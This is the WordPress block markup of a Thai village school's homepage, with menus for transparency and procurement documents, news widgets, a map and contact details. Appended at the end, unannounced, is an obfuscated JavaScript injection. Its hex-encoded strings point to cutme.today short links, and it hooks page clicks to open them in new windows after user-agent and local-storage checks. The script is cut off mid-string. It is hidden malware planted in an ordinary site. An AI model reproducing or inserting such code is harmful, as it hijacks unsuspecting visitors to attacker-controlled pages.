wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x6